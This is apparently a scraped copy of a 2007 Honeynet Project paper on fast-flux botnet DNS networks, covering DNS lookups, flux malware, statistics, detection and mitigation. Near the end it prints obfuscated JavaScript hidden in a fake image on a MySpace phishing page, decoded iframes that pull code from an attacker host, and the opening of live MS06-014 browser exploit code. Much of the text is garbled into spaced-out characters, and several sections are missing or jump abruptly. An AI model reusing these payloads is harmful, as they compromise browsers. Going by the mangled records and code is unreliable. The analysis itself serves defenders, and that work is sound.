Академический Документы
Профессиональный Документы
Культура Документы
An Ever Changing Enemy Primary Authors: William Salusky Robert Danford Last Modified: 13 July, 2007
INTRODUCTION
One of the most active threats we face today on the Internet is cyber-crime. Increasingly capable criminals are constantly developing more sophisticated means of profiting from online criminal activity. This paper demonstrates a growing, sophisticated technique called fast-flux service networks which we are seeing increasingly used in the wild. Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations. In this paper we will first provide an overview of what fast-flux service networks are, how they operate, and how the criminal community is leveraging them, including two types which we have designated as single-flux and double-flux service networks. We then provide several examples of fast-flux service networks recently observed in the wild,. Next we detail how fast-flux service network malware operates and present the results of research where a honeypot was purposely infected with a fast-flux agent. Finally we cover how to detect, identify, and mitigate fast-flux service networks, primarily in large networking environments. At the end we supply five appendixes providing additional information for those interested in digging into more technical detail.
SINGLE-FLUX NETWORKS
In Figure 1 below we demonstrate a single-flux network. We compare a normal web browser communicating directly with a typical website against the case of a single-flux service network, where the end users browser communication is proxied via a redirector (the flux-bot or flux-agent). When a victim believes that they are browsing http://flux.example.com, their browser is actually communicating with the fast-flux service network redirector which redirects the requests to the target website. Single-flux service networks change the DNS records for their front end node IP address as often as every 3-10 minutes, so even if one flux-agent redirector node is shut down, many other infected redirector hosts are standing by and available to quickly take its place. We have found these fast-flux networks to be composed of primarily compromised home computers.
Fast-flux networks are responsible for many illegal practices, including online pharmacy shops, money mule recruitment sites, phishing websites, extreme/illegal adult content, malicious browser exploit websites, and the distribution of malware downloads. Beyond our regular observation of new DNS and HTTP services, other services such as SMTP, POP, and IMAP can be delivered via fast-flux service networks. Because fast-flux techniques utilize blind TCP and UDP redirects, any directional service protocol with a single target port would likely encounter few problems being served via a fast-flux service network.
On the left-hand side, we depict a single-flux lookup: the client wants to resolve the address http://flux.example.com/ flux.example.com. First, it asks the DNS root nameserver which name server is responsible for the top-level domain .com and receives an answer (omitted in the picture). In a second step, the client queries the .com nameserver for the domain example.com and receives as an answer a referral to the nameserver ns.example.com. Now the client can query the authoritative DNS server ns.example.com for the actual IP address of the address flux.example.com. The authoritative nameserver answers with an IP address that the client can then attempt to initiate direct communication with. For a normal DNS lookup, the answer IP address usually remains constant over a certain period of time, whereas for single-flux nodes, the answer changes frequently. At the right hand side, we depict a DNS lookup for an address within a double-flux domain. Again, the client wants to look up the address flux.example.com. Once again, the first step (lookup at root nameserver) is omitted for sake of brevity. Next, the client queries the nameserver responsible for the top-level domain .com for
the authoritative nameserver for the domain example.com. In a third step, the client then queries the authoritative DNS server ns.example.com for the address flux.example.com. However, this authoritative nameserver is actually part of the double-flux scheme itself and its own IP address changes frequently. When a DNS request for flux.example.com is received from the client, the current authoritative nameserver forwards the queries to the mothership node for the required information. The client can them attempt to initiate direct communication with the target system (although this target system will itself be a dynamically changing front end flux-agent node).
Single-flux nets appear to apply some form of logic in deciding which of their available IP addresses will be advertised in the next set of responses. This may be based on ongoing connection quality monitoring (and perhaps a load-balancing algorithm). New flux-agent IP addresses are inserted into the fast-flux service network to replace nodes with poor performance, being subject to mitigation or otherwise offline nodes. Now lets take a look at the DNS records of the same domain name 30 minutes later and see what has changed:
; ;W H E N :S a tF e b32 0 : 4 0 : 0 42 0 0 7( ~ 3 0m i n u t e s / 1 8 0 0s e c o n d sl a t e r ) d i v e w i t h s h a r k s . h k .1 8 0 0I NA2 4 . 8 5 . 1 0 2 . x x x[ x x x . v s . s h a w c a b l e . n e t ]N E W d i v e w i t h s h a r k s . h k .1 8 0 0I NA6 9 . 4 7 . 1 7 7 . x x x[ d 4 7 6 9 x x x 1 7 7 . t r y . w i d e o p e n w e s t . c o m ]N E W d i v e w i t h s h a r k s . h k .1 8 0 0I NA7 0 . 6 8 . 1 8 7 . x x x[ x x x . v f . s h a w c a b l e . n e t ] d i v e w i t h s h a r k s . h k .1 8 0 0I NA9 0 . 1 4 4 . 4 3 . x x x[ d 9 0 1 4 4 4 3 x x x . c u s t . t e l e 2 . f r ] d i v e w i t h s h a r k s . h k .1 8 0 0I NA1 4 2 . 1 6 5 . 4 1 . x x x[ 1 4 2 1 6 5 4 1 x x x . m s j w . h s d b . s a s k n e t . s k . c a ] d i v e w i t h s h a r k s . h k .1 8 0 0I NN Sn s 1 . w o r l d w r . c o m . d i v e w i t h s h a r k s . h k .1 8 0 0I NN Sn s 2 . w o r l d w r . c o m . n s 1 . w o r l d w r . c o m . 8 5 2 4 8I NA6 6 . 2 3 2 . 1 1 9 . x x x[ H V C A S-H I V E L O C I T YV E N T U R E SC O R P ] n s 2 . w o r l d w r . c o m . 8 2 9 9 1I NA2 0 9 . 8 8 . 1 9 9 . x x x[ v p d n d s l 2 0 9 8 8 1 9 9 x x x . a l a m i . n e t ]
As we see, highlighted in bold two of the advertised IP addresses have changed. Again, these two IP addresses belong to dial-up or broadband networks. Another 30 minutes later, a lookup of the domain returns the following information:
; ;W H E N :S a tF e b32 1 : 1 0 : 0 72 0 0 7( ~ 3 0m i n u t e s / 1 8 0 0s e c o n d sl a t e r ) d i v e w i t h s h a r k s . h k .1 2 3 8I NA6 8 . 1 5 0 . 2 5 . x x x[ x x x . e d . s h a w c a b l e . n e t ]N E W d i v e w i t h s h a r k s . h k .1 2 3 8I NA7 6 . 2 0 9 . 8 1 . x x x[ S B I S A S-A T & TI n t e r n e tS e r v i c e s ]T h i so n ec a m eb a c k ! d i v e w i t h s h a r k s . h k .1 2 3 8I NA1 7 2 . 1 8 9 . 8 3 . x x x[ x x x . i p t . a o l . c o m ]N E W d i v e w i t h s h a r k s . h k .1 2 3 8I NA2 0 0 . 1 1 5 . 1 9 5 . x x x[ p c x x x . t e l e c e n t r o . c o m . a r ]N E W d i v e w i t h s h a r k s . h k .1 2 3 8I NA2 1 3 . 8 5 . 1 7 9 . x x x[ C N TA u t o n o m o u sS y s t e m ]N E W d i v e w i t h s h a r k s . h k .1 2 3 8I NN Sn s 1 . w o r l d w r . c o m . d i v e w i t h s h a r k s . h k .1 2 3 8I NN Sn s 2 . w o r l d w r . c o m . n s 1 . w o r l d w r . c o m . 8 3 4 4 6I NA6 6 . 2 3 2 . 1 1 9 . x x x[ H V C A S-H I V E L O C I T YV E N T U R E SC O R P ] n s 2 . w o r l d w r . c o m . 8 1 1 8 9I NA2 0 9 . 8 8 . 1 9 9 . x x x[ v p d n d s l 2 0 9 8 8 1 9 9 x x x . a l a m i . n e t ]
Now, we observe four new IP addresses and one IP address that we saw in the first query. This demonstrates the round-robin address response mechanism used in fast-flux networks. As we have seen in this example, the A records for the domain are constantly changing. Each one of these systems represents a compromised host acting as a redirector, a redirector that eventually points to the money mule web site. A significant response issue is that the incident responders do not know the ultimate destination of the money mule site unless they have access to one of the redirector nodes. This creates a far more dynamic and robust environment for the criminals. Next we will consider double-flux networks, where criminals add an additional layer of complexity to improve their security. Double-Flux: MySpace Double-flux is where both the NS records (authoritative name server for the domain) and A records (web serving host or hosts for the target) are regularly changed, making the fast-flux service network much more dynamic. For double-flux techniques to work, the domain registrar has to allow the domain administrator the ability to frequently change the NS information, which is not something that usually occurs in normal domain management. In the example below, we observe a phishing attack directed against the popular social networking web site MySpace. The attacker has created a bogus website called login.mylspacee.com. This fake website appears visually to be the real MySpace web site, but instead harvests MySpace user authentication credentials from anyone who is tricked into logging in to the fake site. To make it harder for security professionals to shut down the fake site, both the NS and A DNS records are constantly changing. Observing DNS activity in such incidents, it is very common to detect a consistent pattern of between five to ten A record in a set of roundrobin responses, in addition to a five NS record round-robin response set for any double-flux domain. This signature is becoming the hallmark for identifying doubleflux domains. In the table below, observe that these DNS records are constantly changing:
; ;W H E N :W e dA p r41 8 : 4 7 : 5 02 0 0 7 l o g i n . m y l s p a c e e . c o m .1 7 7I NA6 6 . 2 2 9 . 1 3 3 . x x x[ c 6 6 2 2 9 1 3 3 x x x . h s d 1 . f l . c o m c a s t . n e t ] l o g i n . m y l s p a c e e . c o m .1 7 7I NA6 7 . 1 0 . 1 1 7 . x x x[ c p e 6 7 1 0 1 1 7 x x x . g t . r e s . r r . c o m ] l o g i n . m y l s p a c e e . c o m .1 7 7I NA7 0 . 2 4 4 . 2 . x x x[ a d s l 7 0 2 4 4 2 x x x . d s l . h r l n t x . s w b e l l . n e t ] l o g i n . m y l s p a c e e . c o m .1 7 7I NA7 4 . 6 7 . 1 1 3 . x x x[ c p e 7 4 6 7 1 1 3 x x x . s t n y . r e s . r r . c o m ] l o g i n . m y l s p a c e e . c o m .1 7 7I NA7 4 . 1 3 7 . 4 9 . x x x[ 7 4 1 3 7 4 9 x x x . d h c p . i n s i g h t b b . c o m ] m y l s p a c e e . c o m .1 0 8 8 7 7I NN Sn s 3 . m y h e r o i s y o u r s l o v e . h k . m y l s p a c e e . c o m .1 0 8 8 7 7I NN Sn s 4 . m y h e r o i s y o u r s l o v e . h k . m y l s p a c e e . c o m .1 0 8 8 7 7I NN Sn s 5 . m y h e r o i s y o u r s l o v e . h k . m y l s p a c e e . c o m .1 0 8 8 7 7I NN Sn s 1 . m y h e r o i s y o u r s l o v e . h k . m y l s p a c e e . c o m .1 0 8 8 7 7I NN Sn s 2 . m y h e r o i s y o u r s l o v e . h k . n s 1 . m y h e r o i s y o u r s l o v e . h k . 8 5 4I NA7 0 . 2 2 7 . 2 1 8 . x x x[ p p p 7 0 2 2 7 2 1 8 x x x . d s l . s f l d m i . a m e r i t e c h . n e t ] n s 2 . m y h e r o i s y o u r s l o v e . h k . 8 5 4I NA7 0 . 1 3 6 . 1 6 . x x x[ a d s l 7 0 1 3 6 1 6 x x x . d s l . b u m t t x . s b c g l o b a l . n e t ] n s 3 . m y h e r o i s y o u r s l o v e . h k .8 5 4I NA6 8 . 5 9 . 7 6 . x x x[ c 6 8 5 9 7 6 x x x . h s d 1 . a l . c o m c a s t . n e t ] n s 4 . m y h e r o i s y o u r s l o v e . h k .8 5 4I NA7 0 . 1 2 6 . 1 9 . x x x[ x x x 1 9 . 1 2 6 7 0 . t a m p a b a y . r e s . r r . c o m ] n s 5 . m y h e r o i s y o u r s l o v e . h k .8 5 4I NA7 0 . 1 2 1 . 1 5 7 . x x x[ x x x . 1 5 7 . 1 2 1 . 7 0 . c f l . r e s . r r . c o m ]
About 4 minutes later, for the same domain, only the A records have changed. Notice that the NS records have remained the same.
; ;W H E N :W e dA p r41 8 : 5 1 : 5 62 0 0 7( ~ 4m i n u t e s / 1 8 6s e c o n d sl a t e r ) l o g i n . m y l s p a c e e . c o m .1 6 1I NA7 4 . 1 3 1 . 2 1 8 . x x x[ 7 4 1 3 1 2 1 8 x x x . d h c p . i n s i g h t b b . c o m ]N E W l o g i n . m y l s p a c e e . c o m .1 6 1I NA2 4 . 1 7 4 . 1 9 5 . x x x[ c p e 2 4 1 7 4 1 9 5 x x x . e l p . r e s . r r . c o m ]N E W l o g i n . m y l s p a c e e . c o m .1 6 1I NA6 5 . 6 5 . 1 8 2 . x x x[ a d s l 6 5 6 5 1 8 2 x x x . d s l . h s t n t x . s w b e l l . n e t ]N E W l o g i n . m y l s p a c e e . c o m .1 6 1I NA6 9 . 2 1 5 . 1 7 4 . x x x[ p p p 6 9 2 1 5 1 7 4 x x x . d s l . i p l t i n . a m e r i t e c h . n e t ]N E W l o g i n . m y l s p a c e e . c o m .1 6 1I NA7 1 . 1 3 5 . 1 8 0 . x x x[ a d s l 7 1 1 3 5 1 8 0 x x x . d s l . p l t n 1 3 . p a c b e l l . n e t ]N E W
Checking again one and a half hours later, the NS records for this domain have migrated and five new NS records appear. Similar to the previous example, we see that the A and NS record are hosted at dial-up or broadband providers, indicating that these are compromised hosts used by an attacker for nefarious purposes:
; ;W H E N :W e dA p r42 1 : 1 3 : 1 42 0 0 7( ~ 9 0m i n u t e s / 4 8 7 8s e c o n d sl a t e r ) n s 1 . m y h e r o i s y o u r s l o v e . h k .3 5 9 6I NA7 5 . 6 7 . 1 5 . x x x[ c 7 5 6 7 1 5 x x x . h s d 1 . m a . c o m c a s t . n e t ]N E W n s 2 . m y h e r o i s y o u r s l o v e . h k .3 5 9 6I NA7 5 . 2 2 . 2 3 9 . x x x[ a d s l 7 5 2 2 2 3 9 x x x . d s l . c h c g i l . s b c g l o b a l . n e t ]N E W n s 3 . m y h e r o i s y o u r s l o v e . h k .3 5 9 6I NA7 5 . 3 3 . 2 4 8 . x x x[ a d s l 7 5 3 3 2 4 8 x x x . d s l . c h c g i l . s b c g l o b a l . n e t ]N E W n s 4 . m y h e r o i s y o u r s l o v e . h k .1 8 0I NA6 9 . 2 3 8 . 2 1 0 . x x x[ p p p 6 9 2 3 8 2 1 0 x x x . d s l . i r v n c a . p a c b e l l . n e t ]N E W n s 5 . m y h e r o i s y o u r s l o v e . h k .3 5 9 6I NA7 0 . 6 4 . 2 2 2 . x x x[ x x x . m j . s h a w c a b l e . n e t ]N E W
FAST-FLUX MALWARE
Flux node agents share the most essential and basic capabilities of the traditional, but minimalist IRC-based bot in several ways: they regularly phone home to announce their continued availability, they check for updates, perform download operations, and allow for the execution of arbitrary commands on the local operating system by a remote attacker. However, almost without exception, fast-flux Command and Control (C&C) activity observed in the wild thus far has been HTTP protocol based. The ability of Fast-flux agents to proxy or redirect TCP services appears to be an outgrowth from the redirect functions of legacy IRC bots that possess optional UDP proxy or redirect capabilities. The bundling of these features enables a fast-flux service network to become a powerful criminal tool and helps to make the fast-flux service network operator less easily detectable. The fast-flux front end nodes will either act on command or execute hard-coded instructions to redirect inbound traffic received on configured ports to a specifically chosen upstream fast-flux mothership node. Several fast-flux service network operations have been observed maintaining distributed nodes that act primarily in performing availability and connection quality tests of individual flux-agents within the fast-flux service network. For an example of the development cycle of fast-flux malware, refer to Appendix A. For an example of the infection process for the malware, refer to Appendix B. Below we summarize two commonly used malware that have adopted fast-flux capabilities. Warezov/Stration: The networks based upon these malware variants have been erected to provide a robust platform for sending large volumes of unsolicited email (spam). They have been very successful in this goal and employ advanced techniques such as the constant automated creation of many malware variants to frustrate anti-virus signature creation. Infected machines download these updates on a regular schedule in order to increase the amount of time it takes for a system to be cleaned and taken offline. These updates must be hosted on websites, so if their public IP addresses remain static, the update sites can potentially be taken down fairly easily. Until recently, a strategy of auto-generating pseudo-random domain names which moved around was used to protect such download sites. Starting in May 2007, the criminal organization behind this spam business moved to a fast-flux service network model. This group is now hosting their DNS services and malware download sites via fast-flux service networks and appear to be enjoying continued success in their criminal endeavor. Storm: The biggest competitor of the Warezov/Stration gang is perhaps the criminal organization operating a very large spam sending network based on the family of malware variants dubbed Storm/Peacomm/Peed. They employ a UDP-based P2P model for botnet command and control. This is a highly robust way to operate a large distributed network if the complexities of managing peer lists and minimizing latency can be overcome. They have also employed novel techniques to counter anti-spam solutions, such as generating image-based spam on the fly on the endpoints flux-agent nodes themselves, rather than simply relying on template based messaging. These images are randomized in ways which frustrate the OCR (object character recognition) technologies used in some anti-spam products and have been most commonly used to facilitate fraudulent pump and dump stock spam schemes. In June 2007 this group was observed attempting to modify their P2P network to support fast-flux style networking. This is a significant advance for spam-sending malware and requires further study.
3. The fast-flux registration server (mothership) response to the announcement/registration step is Added Successfully! This we perceive to mean that the infected system has been successfully added to the fast-flux service network. A new victim is standing by for malicious duty. 4. The next step is for the infected system to obtain a configuration file by hourly polling of a settings file on a remote web server. This is where the flux agent learns details including what ports to bind and where the mothership is located and which incoming traffic will be redirected upstream to the mothership. In this case, the fast-flux agent submits a HTTP GET request to another virtual web host that only happens to share the same IP as used by the registration interface. http://xxx.iconnectyou.biz/settings/weby/settings.ini For which the server responds with what appears to be a consistent 197 byte binary/encoded configuration response. We are still attempting to reverse engineer complete details of this session. For full packet payload of the binary/encoded configuration response, please refer to Appendix D. 5. Finally the system downloads a suspiciously named DLL plugin_ddos.dll, whose naming might suggest to some that it is a denial of service component. For more information on this session, refer to Appendix E.
STATISTICS
To give you a better feel of the scope of fast-flux service networks and how many systems are typically involved, below we provide statistics about one specific fast-flux service network. This example was involved in delivery of a PharmaShop scam. Key points include: We collected data from 03 February 2007 to 11 February 2007. The domain itself greatfriedrice.info was created January 02, 2007 at 15:11 and was terminated February 13, 2007 at 04:26 EST. To gather our information we queried DNS every 2 minutes and then collected information on the IP addresses assigned to the domain name and how those IP addresses (A and NS records) changed over time. A total of 3,241 unique IP addresses were utilized in this fast-flux service net during the study. Of these unique IP addresses, 1,516 were advertised as Authoritative NS records. 2,844 were short lived TTL A record round robins used for HTTP proxy/redirect. 256 different Autonomous Systems (AS's) were represented in the infection base. 181 ASs served fluxDNS, and 241 ASs served fluxHTTP redirection. This may be an indicator of provider policies regarding inbound blocking policies of either UDP 53 or TCP 80 into subscriber populations. Below is a table highlighting the ASs that had the most infected systems as part of the fast-flux service network. This example was chosen because it was monitored at the highest resolution (every 2 min). To date over 80,000 flux IPs have been logged so far with over 1.2 million unique mappings. AS Breakdown for DNS Flux Networks Total# 331 300 47 40 35 28 27 27 25 25 AS# 7132 (SBC/ATT) 1668 (AOL) 11427 (RR) 33287 11426 3356 33491 20115 7015 13343
AS Breakdown for HTTP Flux Networks Total# 668 AS# 7132 (SBC/ATT)
662 75 73 51 46 40 39 37 36
1668 (AOL) 3356 11427 33287 33491 20115 11426 7015 11351
The following simple shell scripts injects the Base64-encoded string helloflux (aGVsbG9mbHV4IAo) one for a HTTP request and then another for a DNS request. With the help of the Snort signatures from above, we can then trace the path of the strings through the network.
$e c h of l u x t e s t . s h; # ! / b i n / b a s h #S i m p l es h e l ls c r i p tt ot e s t #s u s p e c t e df l u xn o d e so ny o u rm a n a g e dn e t w o r k s e c h o"a G V s b G 9 m b H V 4 I A o "|n cw1$ { 1 }8 0 d i g+ t i m e = 1a G V s b G 9 m b H V 4 I A o . d n s . c o m@ $ { 1 }
If a service provider lacks IDS capability in the user space, yet has the capability to report on NetFlow, this mechanism can also be used to detect fast-flux service networks. This is not as good as the IDS-based detection method presented above, but looking for TCP 80 and/or UDP 53 into user IP space is a start. This kind of traffic should normally not occur and is thus a sign of a possible flux-agent. The following listing provides some further ideas to stop this kind of threat. In brackets, we list which party could implement such mitigation policies: 1. Establish policies to enable blocking of TCP 80 and UDP 53 into user-land networks if possible (ISP) 2. Block access to controller infrastructure (motherships, registration, and availability checkers) as they are discovered. (ISP) 3. Improving domain registrar response procedures, and auditing new registrations for likely fraudulent purpose. (Registrar) 4. Increase service provider awareness, foster understanding of the threat, shared processes and knowledge. (ISP) 5. Blackhole DNS and BGP route injection to kill related motherships and management infrastructure. (ISP) 6. Passive DNS harvesting/monitoring to identify A or NS records advertised into publicly routable user IP space. (ISPs, Registrars, Security professionals, ...) This is just a very brief overview of how fast-flux service networks can be mitigated, and further research is required in this subject area.
SUMMARY
Fast-flux service networks demonstrate an evolutionary step for online crime operations. Fast-flux service networks create robust, obfuscating service delivery infrastructures that make it difficult for system administrators and law enforcement agents to shut down active scams and identify the criminals operating them. The robustness, obfuscation capabilities, scalability and increased availability of fast-flux service produce an increased Return on Investment (ROI) for the criminals who operate them. Just as in legitimate business, the Internet represents a huge economic business model for online crime, which unfortunately means that we can expect techniques such as fast-flux service networks to continue to evolve. Often emerging threats such as fast-flux service networks are a step ahead of security professionals, and it looks likely that this particular arms race will continue into the foreseeable future.
ACKNOWLEDGEMENTS
A paper of this complexity requires the input and cooperation from many people and organizations. In particular the Honeynet Project would like to thank the following people: * The SANS Internet Storm Center * Multiple service provider networks * David Watson of the UK Honeynet Project (reviewer) * Thorsten Holz of the German Honeynet Project (reviewer) * Fyodor of the Honeynet Project (reviewer) * David Dittrich of the Honeynet Project (reviewer) * Jamie Riden of the UK Honeynet Project (reviewer) * Earl Sammons of the Honeynet Project (reviewer) * Georg Wicherski of the German Honeynet Project (reviewer) * Nico Fischbach of the French Honeynet Project (reviewer) * Christian Seifert of the NZ Honeynet Project (reviewer) * Christine Kilger (design artist)
APPENDICES
Appendices:
Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe File type(s): MS-DOS executable (EXE), OS/2 or MS Windows Size: 50176 Bytes Access: 2007-03-15 02:09:03.000000000 -0400 Modify: 2007-03-09 10:51:26.000000000 -0500 Change: 2007-03-15 02:09:03.000000000 -0400 MD5: 70978572bc5c4fecb9d759611b27a762 SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400) [2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 http://xxx.myexes.hk/exes/webdlx/weby.exe Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll File type(s): MS-DOS executable (EXE), OS/2 or MS Windows Size: 9728 Bytes Access: 2007-04-02 15:39:05.000000000 -0400 Modify: 2007-03-09 23:48:17.000000000 -0500 Change: 2007-04-02 15:39:06.000000000 -0400 MD5: 5870fd7119a91323dbdf04ebd07d0ac7 SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400) [2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 http://65.111.176.xxx/weby/plugin_ddos.dll Previous incarnation: Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe File type(s): MS-DOS executable (EXE) Size: 29557 Bytes Access: 2007-02-06 15:26:03.000000000 -0500 Modify: 2007-02-02 08:47:24.000000000 -0500 Change: 2007-02-06 15:26:03.000000000 -0500 MD5: e903534fab14ee7e00c279d64f578cbb SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93 Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500) [2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe Even older sample: Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe File type(s): MS-DOS executable (EXE) Size: 29425 Bytes Access: 2007-01-20 16:29:06.000000000 -0500 Modify: 2007-01-20 05:39:22.000000000 -0500 Change: 2007-01-20 16:29:06.000000000 -0500 MD5: 88b58b62ae43f0fa42e852874aefbd01 SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5 Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500) [2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe A prehistoric sample of flux-agent code (according to Internet time). We first observed nodes infected with this malware in the middle of 2006, but only acquired a malware sample for analysis in November 2006: Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe File type(s): MS-DOS executable (EXE), OS/2 or MS Windows Size: 11264 Bytes Access: 2006-11-14 06:39:03.000000000 -0500 Modify: 2006-11-14 06:29:14.000000000 -0500 Change: 2006-11-14 06:39:03.000000000 -0500 MD5: d134894005c299c1c01e63d9012a12c6 SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500) [2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE
By following the above /da3e/index.php link, we end up going to a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:
< ! -o n R e q u e s t E n d> < s c r i p t > w i n d o w . s t a t u s = " D o n e " < / s c r i p t > < i f r a m es r c = " . . / . f o o t e r _ 0 1 . g i f "w i d t h = 0h e i g h t = 0 > < / i f r a m e >
The iframe rendered /.footer_01.gif , which is not an actual gif file, but instead an encoded/obfuscated JavaScript snippet. Below we can see the obfuscated JavaScript code it feeds us.
< S C R I P TL a n g u a g e = " J a v a S c r i p t " > e v a l ( u n e s c a p e ( " % 6 6 % 7 5 % 6 E % 6 3 % 7 4 % 6 9 % 6 F % 6 E % 2 0 % 6 4 % 2 8 % 7 3 % 2 9 % 7 B % 7 2 % 3 D % 6 E % 6 5 % 7 7 % 2 0 % 4 1 % 7 2 % 7 2 % 6 1 % 7 9 % 2 8 % 2 9 % 3 B % 7 4 % 3 D % 2 2 % 2 2 % 3 B % 6 A % 3 D % 3 0 % 3 B % 6 6 % 6 F % 7 2 % 2 8 % 6 9 % 3 D % 7 3 % 2 E % 6 C % 6 5 % 6 E % 6 7 % 7 4 % 6 8 % 2 D % 3 1 % 3 B % 6 9 % 3 E % 3 0 % 3 B % 6 9 % 2 D % 2 D % 2 9 % 7 B % 7 4 % 2 B % 3 D % 5 3 % 7 4 % 7 2 % 6 9 % 6 E % 6 7 % 2 E % 6 6 % 7 2 % 6 F % 6 D % 4 3 % 6 8 % 6 1 % 7 2 % 4 3 % 6 F % 6 4 % 6 5 % 2 8 % 7 3 % 2 E % 6 3 % 6 8 % 6 1 % 7 2 % 4 3 % 6 F % 6 4 % 6 5 % 4 1 % 7 4 % 2 8 % 6 9 % 2 9 % 5 E % 3 2 % 2 9 % 3 B % 6 9 % 6 6 % 2 8 % 7 4 % 2 E % 6 C % 6 5 % 6 E % 6 7 % 7 4 % 6 8 % 3 E % 3 8 % 3 0 % 2 9 % 7 B % 7 2 % 5 B % 6 A % 2 B % 2 B % 5 D % 3 D % 7 4 % 3 B % 7 4 % 3 D % 2 2 % 2 2 % 7 D % 7 D % 6 4 % 6 F % 6 3 % 7 5 % 6 D % 6 5 % 6 E % 7 4 % 2 E % 7 7 % 7 2 % 6 9 % 7 4 % 6 5 % 2 8 % 7 2 % 2 E % 6 A % 6 F % 6 9 % 6 E % 2 8 % 2 2 % 2 2 % 2 9 % 2 B % 7 4 % 2 9 % 7 D " ) ) ; d ( u n e s c a p e ( " % 0 8 < v r k p a q >g l m F? q w v c v q , u m f l k u < v r k p a q > " ) ) ; < / S C R I P T > < S C R I P TL a n g u a g e = " J a v a S c r i p t " > e v a l ( u n e s c a p e ( " % 6 6 % 7 5 % 6 E % 6 3 % 7 4 % 6 9 % 6 F % 6 E % 2 0 % 6 4 % 2 8 % 7 3 % 2 9 % 7 B % 7 2 % 3 D % 6 E % 6 5 % 7 7 % 2 0 % 4 1 % 7 2 % 7 2 % 6 1 % 7 9 % 2 8 % 2 9 % 3 B % 7 4 % 3 D % 2 2 % 2 2 % 3 B % 6 A % 3 D % 3 0 % 3 B % 6 6 % 6 F % 7 2 % 2 8 % 6 9 % 3 D % 7 3 % 2 E % 6 C % 6 5 % 6 E % 6 7 % 7 4 % 6 8 % 2 D % 3 1 % 3 B % 6 9 % 3 E % 3 0 % 3 B % 6 9 % 2 D % 2 D % 2 9 % 7 B % 7 4 % 2 B % 3 D % 5 3 % 7 4 % 7 2 % 6 9 % 6 E % 6 7 % 2 E % 6 6 % 7 2 % 6 F % 6 D % 4 3 % 6 8 % 6 1 % 7 2 % 4 3 % 6 F % 6 4 % 6 5 % 2 8 % 7 3 % 2 E % 6 3 % 6 8 % 6 1 % 7 2 % 4 3 % 6 F % 6 4 % 6 5 % 4 1 % 7 4 % 2 8 % 6 9 % 2 9 % 5 E % 3 2 % 2 9 % 3 B % 6 9 % 6 6 % 2 8 % 7 4 % 2 E % 6 C % 6 5 % 6 E % 6 7 % 7 4 % 6 8 % 3 E % 3 8 % 3 0 % 2 9 % 7 B % 7 2 % 5 B % 6 A % 2 B % 2 B % 5 D % 3 D % 7 4 % 3 B % 7 4 % 3 D % 2 2 % 2 2 % 7 D % 7 D % 6 4 % 6 F % 6 3 % 7 5 % 6 D % 6 5 % 6 E % 7 4 % 2 E % 7 7 % 7 2 % 6 9 % 7 4 % 6 5 % 2 8 % 7 2 % 2 E % 6 A % 6 F % 6 9 % 6 E % 2 8 % 2 2 % 2 2 % 2 9 % 2 B % 7 4 % 2 9 % 7 D " ) ) ; d ( u n e s c a p e ( " % 0 8 < g o c p d k > < 3 ? v j e k g j \ " 3 ? j v f k u \ "d k e , 1 2 ] p g f c g j o m a , a 6 a 6 ` d c d 8 r v v j? a p q \ " g o c p d k > " ) ) ; < / S C R I P T >
The decoded result of the above JavaScript is seen below, which is nothing more then another iframe redirecting with a connection to another site.
< s c r i p t > w i n d o w . s t a t u s = " D o n e " < / s c r i p t > < i f r a m es r c = " h t t p : / / x x x . f a f b 4 c 4 c . c o m / h e a d e r _ 0 3 . g i f " > < / i f r a m e >
The Iframe rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file for which the decoded result of the above /header_03.gif is:
< s c r i p t > w i n d o w . s t a t u s = " D o n e " < / s c r i p t > < i f r a m es r c = " h t t p : / / x x x . f a f b 4 c 4 c . c o m / r o u t i n e . p h p "w i d t h = 1h e i g h t = 1 > < / i f r a m e >
Following the iframe rendered /routine.php file results in another JavaScript encoded/obfuscated file. The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006. Below is the decode of the actual attack. Be Careful, This is Live Exploit Code.
< s c r i p tt y p e = " t e x t / j a v a s c r i p t " > f u n c t i o nh a n d l e E r r o r ( ){ r e t u r nt r u e ; } w i n d o w . o n e r r o r=h a n d l e E r r o r ; < / s c r i p t > < s c r i p t > w i n d o w . s t a t u s = " D o n e " < / s c r i p t > < S C R I P Tl a n g u a g e = " V B S c r i p t " > I fn a v i g a t o r . a p p N a m e = " M i c r o s o f tI n t e r n e tE x p l o r e r "T h e n I fI n S t r ( n a v i g a t o r . p l a t f o r m , " W i n 3 2 " )< >0T h e n
